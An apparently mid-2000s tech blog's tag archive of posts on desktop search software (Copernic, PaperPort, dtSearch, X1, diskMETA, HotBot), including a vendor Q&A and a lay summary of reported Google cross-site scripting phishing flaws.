Tag Archives: Desktop search

Copernic’s New Search

Copernic have officially launched version 2 of their excellent Desktop Search software. It’s been around in beta for a while and it’s excellent, though I’d still like to see more economical use of screen space. Not all of us are working on high-res big screens. Press release isn’t out yet but should be here when it is. Pre-release page is here.

Technorati Tags: , ,

The PaperPort View

Further to my column in this week’s WSJ.com/AWSJ on PaperPort Pro and PaperMaster Pro, here are some e-mailed answers from Bob Anderson (ScanSoft Regional Director Asia Pacific and Japan) in response to my questions about PaperPort Pro:

1) What are the improvements in version 10 (PaperPort Professional 10) over previous versions?

A) Faster and easier folder navigation with Bookmark Workspaces and Split Desktop. Bookmark Workspaces allow you to bookmark your most widely used folders and quickly jump back to them when you need them. Using the Split Desktop you can also look into two folders at once to move files quickly and easily between them or to simply compare the contents of two folders at the same time.

B) A new All-in-One Search Engine and Index Manager for faster and more flexible indexing of scanned files and faster retrieval of documents you search.

C) PDF Support

a) PDF Create! PaperPort includes the capability to create PDF files from all of your MS Office documents or any other PC application with PDF Create! – just like Adobe® Acrobat®. PDF has emerged as the universal standard for sharing and archiving documents and images. The PDF format lets you send any document or image to anyone, regardless of whether they use a PC or a Macintosh® computer, and they can view and print the file – exactly as it looked on your computer – without the need to have the application that was used to create the original file. Now, there is no need to buy any additional PDF creating software – PaperPort 10 Professional does everything you need.

b) PDF Combine, Stack, Drag&Drop, Cut, Paste and Delete Manipulating PDF files is easier. Accelerates the creation and assembly of custom documents by mimicking the way you work with paper documents. Easily add or remove pages, reorder them or create new documents with drag and drop tools that making working with electronic documents as simple as working with actual paper documents on your desktop.

c) PDF Security PaperPort protects your information by allowing you to set security options for individual documents. Keep your content locked down by requiring a password to view or print sensitive information.

d) PageViewer PDF Rendering – Resolution Adjustable Customise the view on your desktop by increasing or decreasing the resolution of graphics in PageViewer mode to optimise PaperPort’s performance to suit your needs.

D) Superior document assembly capabilities that make working with digital documents as easy as working with real paper by using automatic conversion to PDF, Page Thumbnails and the Split Desktop. Page Thumbnails allow you to cut, copy, paste, delete and rearrange the pages of a PDF document. You may drag whole documents of ANY format (print capable) into the Page Thumbnails of a PDF document. The ability to assemble documents as easily as dragging pages or documents from one document to another is greatly enhanced by the Split Desktop that allows you to merge documents across two different folders.

E) Faster and more productive scanning with a new scanner interface that provides for “One-click Scanning” and “Batch Scanning” capabilities

F) PaperPort SET tools (Scanner Enhancement Technology) are on the desktop for fast document image corrections. The PaperPort SET Tools allow you to rotate, auto-straighten, convert document colours, adjust image colour, hue, etc. all with a right-click on any image document.

G) Unparalleled ease-of-use and accessibility to PDF creation functions, including password protection, integrated throughout PaperPort and popular Microsoft applications.

2) What kind of users, and usage, are you aiming at? Do you have any interesting customer stories about how they’ve used PP, or perhaps your own experience?

We are looking to provide comprehensive desktop document management solutions for individual knowledge workers in the small business marketplace or for functional workgroups in large organisations.

A) Document Management – Anyone that wants to eliminate the use of paper as their primary means of storage and retrieval will become more organised using their computer and PaperPort. This includes home, home office and any business application that currently relies on a paper process and is looking for a way to organise, find and share information more easily and efficiently.

B) Scan-to-Desktop – With the proliferation of network multifunction and digital copier devices, scanning has really become a mainstream business function. PaperPort Professional helps millions of professionals to eliminate paper and to streamline the way they work with all of their documents. With PaperPort, you can easily scan using any connected or networked scanning device including flatbed, All-in-One and Multi-Function Devices. PaperPort supports WIA, TWAIN and ISIS scanner drivers as well as important industry-standard formats including PDF, TIFF and MAX. Its unique ability to work with desktop, network and departmental scanners and even digital copiers make it an invaluable productivity application for organisations of all sizes. Users can e-mail, fax or send documents to repositories on a networked file server with a simple drag-and-drop.

We have many interesting customer case studies that are attached as separate files.

3) This kind of product has, in my view, remained quite niche. People still appear to be somewhat resistant to the idea of committing their paper to a scanner. Is this true, and if not, do you have any statistics to support your view? If it is the case, how are you going about convincing users to change their habits?

Document scanning adoption is increasing as improved, affordable networked multi-function and workgroup/departmental devices penetrate new market segments. Recent research by organisations such as Gartner Group and IDC shows that the adoption of scanners – particularly in the enterprise in a networked environment – has seen tremendous growth in recent years. Multi-function devices and networked or departmental scanners with automatic document feeders is the fastest growing segment for scanner manufacturers, growing at an annual rate of 3.2 percent a year (source: Gartner) while colour multifunction devices are experiencing double digit growth. These scanners are being used primarily for document scanning (rather than photo scanning as may have been the case in the past), and e-mailing attachments has become more commonplace than faxing paper documents. As these devices continue to grow in popularity, so does the need for document management software such as PaperPort that allows people to not only get paper into a PC, but also to organise, find and share that information once it is in a digital environment.

The popularity of document management software also becomes particularly evident when we look at our customer base – nearly 4 million people use PaperPort, and say that, after e-mail, it is the application that they use most on their PC. We do recognise that we will likely never see a truly “paperless office,” but there is indeed a need for document management software such as PaperPort that allows digital and paper information to coexist and work together more efficiently.

According to Keith Kmetz, program director, Hardcopy Peripherals Solutions and Services, IDC, “The proliferation of network multifunction and digital copier devices, combined with intuitive applications such as PaperPort, has finally made document scanning a mainstream business function. Products like PaperPort Professional 10 give organisations the ability to deliver the benefits of scanning, PDF and document assembly to every business desktop.”

4) Where do you see the future of this kind of product? Is it going to morph into other products that index users’ documents (Desktop Search, etc), and do you see any combination of products like PP and voice recognition? After all, character recognition and voice recognition would appear to be cousins, and ScanSoft have strong footprints in both areas.

PaperPort is an environment to manage all kinds of documents. Scanning, document assembly and desktop search are all critical components in the document management lifecycle. PaperPort All-in-One search is already a comprehensive desktop search tool allowing you to search all scanned paper, image and text document types including PDF.

So where in managing documents do our customers need the most improvements to increase their productivity and find value in the next version of PaperPort? Voice recognition is definitely an area of growth as the accuracy of the technology allows for greater acceptance. Document collaboration, distribution and the effective use of multifunction devices are all areas where there is still significant opportunity for improvement and productivity. More and more multifunction devices are replacing single purpose machines making scanned documents more accessible and therefore the tools to manage those documents at the desktop are in greater demand.

With regards to the character and voice recognition, ScanSoft’s optical character recognition (OCR) technology can be used to create an index of a document by converting the ‘picture’ of the textual information within a document into computer text. Similarly, ScanSoft’s AudioMining technology can be used to create XML speech indexes of every spoken word contained in an audio and video file; in short, AudioMining does to audio and video what OCR does to a document. For the enterprise, particularly in industries where recording telephone calls is a requirement (such as banking, insurance, etc), AudioMining can be used to jump directly to a specific location in a conversation. Public Web users could also benefit when searching for training videos, research talks at universities, government hearings and news conferences, etc.

5) The PP interface hasn’t changed much in a decade, arguably. Is this version a major GUI revamp, or are you sticking with what you have?

I’d say we accomplished a lot of both. We have a very large user base that is quite familiar with the features and functions of the program that are directly tied to the easy-to-use interface. We wanted to make changes that specifically enhance the productivity of document assembly, search, PDF creation, password protection and management to further the concept of “electronic paper” without compromising where our customers have already found significant value.

Also worth noting is that PaperPort is available in multiple languages in both Western and now in Asian language versions. ScanSoft added Chinese (Traditional & Simplified), Japanese & Korean with OCR in the native language to the product line-up during the later half of 2004. The Asian version is coming to market through our various customers including OEM, licensees and general distribution partners

6) Why is one not able to preview documents in thumbnail view (in other words, being able to see all pages of the document in thumbnail, while being able to see full size preview of a page in the same window by clicking on one of the thumbnails), a feature common in other programs as far back as 1998? I’ve always felt this to be a key weakness in PP.

PaperPort 10 features Page Thumbnails on both the PaperPort Desktop and within the PaperPort PageViewer. We have also added significant value to these thumbnails by allowing you to cut, copy, paste, delete and rearrange the pages of a PDF document. You may drag whole documents of ANY format into the page thumbnails of any PDF document for automatic conversion to PDF and easy document assembly (See PaperPort menu item “View:Page Thumbnails”).

7) Another weakness I’ve felt exists has been the OCR. Given ScanSoft’s strengths in this field, why is PP’s inbuilt engine not more powerful?

The features of PaperPort OCR are dedicated to specific tasks within PaperPort and are generally adequate for most business purposes providing an appropriate amount of value for our customers. To enhance the OCR capabilities a customer may add professional OCR speed, accuracy and value by purchasing ScanSoft OmniPage which will automatically upgrade the PaperPort OCR capability.

8) Where does Acrobat/PDF fit into all this? Both you and PaperMaster now support direct-to-PDF scanning, and products like Fujitsu’s ScanSnap use it by default. Is this the way things will go? Have they already snuffed out alternatives? What are the advantages of this, and are there disadvantages? Adobe’s interface, in my view, doesn’t make it easy for users to tweak, annotate or fix PDF files.

The greatest challenge to streamlining document-based processes in business is the fact that there are two incompatible dominant electronic document formats – Microsoft® Word and PDF. Microsoft Word provides professionals with a rich environment for document creation and collaborative authoring but the editable Microsoft Word format is not well suited for electronic publishing and online document storage. Conversely, PDF has expanded from its traditional roots as a design and pre-press tool to an electronic file sharing standard providing business users with a format that is well suited for the distribution, viewing and archiving of documents.

The result is that Microsoft Word is the standard for authoring and editing business documents, while PDF is becoming the preferred way of distributing and sharing business documents online. The pervasiveness of Microsoft Word (400 million) and Adobe® Acrobat® Reader (500 million) gives rise to the need for document management solutions that enable the seamless movement of documents between the two dominant formats.

However, traditional solutions for PDF creation and management, such as Adobe Acrobat, are not priced or designed with the business user in mind. The ScanSoft family of PDF products – PDF Create!, PDF Converter, and PDF Converter Professional 2, address this need by providing business professionals with the ability to more seamlessly move between the two dominant electronic document formats – Microsoft Word and PDF.

We extend this PDF support into PaperPort Professional 10 as well, by including not only Scan-to-PDF and the ability to convert any format to PDF, but also ScanSoft PDF Create!, which allows users to quickly create a PDF from any PC application, or merge multiple files into a PDF. We also continue to support and make available our own internal “PaperPort Image” format as well as supporting TIFF, JPEG, GIF and BMP as long as our customers require these formats. We also believe that a true desktop management system encompasses scanned file formats as well as popular digital application files.

dtSearch: Not Dead. Not Yet.

Despite my love of indexers (and I’m in Seventh Heaven now that all the big boys are throwing out desktop search engines like it was a Bay City Rollers’ reunion) I still stick for most of my searching with dtSearch. It’s expensive, it’s tough, it’s ugly, but it gets the job done. And now they’ve added a feature which might not get you too excited, but for me is key: better viewers (or file parsers, if you want to get technical) for Microsoft documents.

Version 6.5 of dtSearch Desktop (free to those who are 6.x users) means you can see Word documents or Excel spreadsheets or PowerPoint presentations in their original glory. Now folks are going to say, well I can do that with X1 or more or less any of the other indexers that include built-in viewers, but I’d like to correct you: You can’t. Well you can if you don’t have big files, but over a certain size, you will get an error. And I have big Word files, all tabled up, and they nearly always don’t appear. In dtSearch they did come up, but not in with any decent formatting. Now they do. (Other features listed here.)

DtSearch, long the mainstay of a once sparse field, is not going away quietly. Good for them.

The Desktop Search Dichotomy

I’ve updated my directory of desktop search engines and indexers to take into account the Yahoo/X1 tie-up and one or two other changes in the landscape since I created it. Yahoo!, as you have no doubt heard, is basically giving away a free version of X1, quite an excellent file indexer and searcher which would usually cost about $70. A nice deal, but all this leaves me with an odd taste in the mouth.

While I’ve been making a noise for years about this fundamental weakness in our computers (where we can find stuff online more easily than our own computer) why is it only when the super big boys get in on the act does anyone stand up and take notice? Enfish have been offering pretty much all this for at least five years and while they didn’t do themselves any favours by making their software worse with each new release, I always believed that gradually people would realise that finding stuff was important and cotton on.

But no. This episode seems to confirm that only when a big company comes along and pushes something right in our face that we wake up to its usefulness. I guess it being free helps. But how many other great ideas are out there that we are ignoring?

Another nervous twitch I have over all this: Given how jittery Yahoo!’s PR were over breaking embargo about the formal release of a product that had been flagged since December, Desktop Search is clearly big business. But is it for the right reasons? Are companies falling over themselves to get inside our hard drives because they want us to be more productive people, or is there something else afoot? Perhaps privacy concerns might start to return to the debate as these programs proliferate.

How To Phish Google

I’ve long believed that phishing emails are just the beginning of a new kind of fraud which is likely to be sophisticated and fast moving. Here’s an example of what they might look like, courtesty of a British computer scientist called Jim Ley, written up at the security website Netcraft. Ley, Netcraft says, “has demonstrated that opportunities exist for fraudsters to launch phishing attacks using cross site scripting bugs on the very widely used Google sites.”

I’m not quite clear from either account whether this is one vulnerability or more, and whether it applies only since Google extended their desktop search to include files on your computer (rather than on the Internet).

As far as I can figure it out, it works like this. A bad guy, rather than try to lure a victim to his dodgy website using a socially engineered email or a virus, would ‘inject’ content into Google to do the same thing. So, say, a user would visit Google to find a credit card submission form which explains that Google is soon to become a subscription-only service at $5 per month, but that users could take advantage of an earlybird special offer to obtain lifetime free searches for just $10. (This is Ley’s example, cited by Netcraft.)

Another vulnerability included in the Google Desktop would, Netcraft says, have “allowed an attacker to search a user’s local machine for passwords and report the results directly back to the attacker’s own web site.” Both vulnerabilities have been fixed, but Netcraft and Ley say incompletely.

I don’t claim to understand the technical aspects of this, and it may be somewhat obscure. But what is worrying is that (a) Ley reports Google as being less than interested in addressing the issues he raised (two years ago, according to his website) and, (b) that if such tricks are occurring to diligent folk like Ley, they must be occurring to hackers and the Internet underground. I’ve said it before, and I’ll say it again: Phishing is not just misleading emails, it’s a multifaceted effort to part us ordinary folk from our online money. And it’s not going to go away. Indeed, like most things technological, it’s a fast escalating arms race, and I don’t think we’ve even started to get it figured out.

Ukraine Weighs In On The Search Stakes

Another addition to my index of indexing programs: diskMETA, from <META> Inc. “the largest search engine provider in Ukraine and a leader in Cyrillic multilingual search engine morphology technologies”.

A press release issued today says diskMETA is one of the fastest desktop search engines, and is available both as freeware and shareware. The program “is intended for extra large data volumes, UP TO 100 GIGABYTES. It can create up to 100 indexes, index up to ONE MILLION various files. The search time is never more than ONE SECOND”. It works on all Windows platforms (98 or higher).

The file search works with Office document formats (DOC, XLS, RTF, TXT), HTML pages, CHM, PDF files, ZIP and RAR archives. There are three versions: Lite (free), Personal ($50) and Pro, which supports morphological English searches and Intranet wide searches ($100)

The search technology used in diskMETA, apparently, “has a long and glorious history. It is used for a decade in the nationwide biggest and most popular web search engine www.meta.ua, in a series of search tools for web-sites and CD-rooms installed in most governmental and financial national institutions” in the Ukraine.

My tupennies’ worth? It’s fast, intuitive and unfussy. You can also view the raw text in a special preview window, but it doesn’t support preview in the same way that X1, dtSearch or the new Copernic Desktop Search do. That said, it’s great to see a new player on the block, especially one so enthusiastic.

Copernic’s Search Desktop Goes Live

Copernic has today released its Desktop Search program, the latest addition to the harvest of desktop indexing software we’ve been cataloging in recent months.

The press release says the software can “search your hard drive in less than a second to pinpoint the right picture, email, music file, etc.” while “your computer won’t slow down at all”. You also “don’t have to worry about bugs, spyware, ads” and, most importantly for some, you won’t have to pay for it.

Copernic Search Desktop “has been designed primarily for desktop search beginners, who will appreciate the care, thought, and hundreds of hours that have gone into the simplified user interface design. Advanced users will want to check out the wide array of customizable search features.”

I tried out a beta version a few weeks back and was impressed. Copernic have had some great products in their time, although Google rather took the sting out of their main search program. I felt the interface for the version I tried did not make the best use of space and wasn’t quite up to their usual standards. Copernic took the suggestions gracefully and have promised changes in future versions. Definitely worth checking out.

The New Search Wars

Search is getting big again. Will it work this time around?

Programs that search your hard drive have been around for a while, but few of them seem to last. There was Magellan, askSam (OK, still around, sort of), Altavista’s Desktop Search, dtSearch (still going strong) and Enfish (still around, barely breathing). That was in the 1990s. But it’s only recently we’ve seen folk get really excited about the space again: There’s X1, Tukaroo (bought out pre-launch by Ask Jeeves), HotBot Search, and now something called blinkx (thanks, Marjolein, for pointing it out.)

Blinkx was officially launched last month as “a free new search tool that thinks and links for you, eliminates the need for keywords or complex search methods, easily finding the information you seek whether it is on the Web, in the news or buried deep within files on your PC.” In other words, pretty much what the other guys do. I haven’t looked too closely at it, but the main idea, as co-founder Kathy Rittweger puts it, is easy search without the logistics: “By eliminating the mechanics of search, such as keywords or sorting through dozens of unqualified results, we drive users more quickly to their goal: finding something, even if they didn’t know it was there!”

That’s good, and I would have said before that that was the way to go, but nowadays I’m not so sure. I think that as disk space grows and people’s hard drives become more complex, different users need different grades of configurability. With most of these new search engines pitching to the ‘lite user’ there’s a danger the more serious document hunter gets left behind. It’s actually a simple calculation: Are you aiming at the casual user who is happy to stumble across a few documents they didn’t know they still had, or are you aiming at the user that needs to find all the documents relevant to their search?

Anyway, it’s good to see folk finally seeing this space for what it is: Horribly underserviced, full of missed opportunities and millions of folk lost on their own hard drives. With Google, Microsoft and others about to enter the fray, here’s hoping that we get something really good out of it.

Another Way To Find Stuff At Home and On The Net

Here’s another one of those tools that should have been around a long, long time ago (in fact one was but it went away: AltaVista Discovery. And don’t get me started on Enfish Tracker). It’s the desktop search engine that indexes your hard drive, the net, all that kind of stuff. Welcome to HotBot Desktop.

HotBot’s Desktop will let you “search local files, email (Outlook & Outlook Express), browser history, and RSS subscriptions. The HotBot Desktop creates a local index to allow you to quickly find local content as you are on or offline.” It also comes with a RSS feed reader and a built-in pop up blocker.

ResourceShelf says it’s by no means perfect, saying there are some bugs that Lycos intend to fix in later versions. It will also only work with Internet Explorer. Anyway, it’s great news that these things are back. I’m building up a list of indexing engines here. Please let me know if I’ve missed any.

A New Search Toolbar — from Copernic


This from the folks at Copernic, who produced a wonderful search engine called, er, Copernic, that has, perhaps, been overtaken by Google: introducing Copernic Meta, “completely new search software that can search multiple search engines in under a second directly from the Windows desktop bar or an IE browser”.

The file is a tad over a megabyte, and installs both into Internet Explorer and your taskbar (the bit at the bottom of the Windows 98/XP screen). Type a phrase in there and it will search nearly every search engine, and throw up a melange of results familiar to anyone who’s used Copernic the program. It’s elegant, configurable — and free.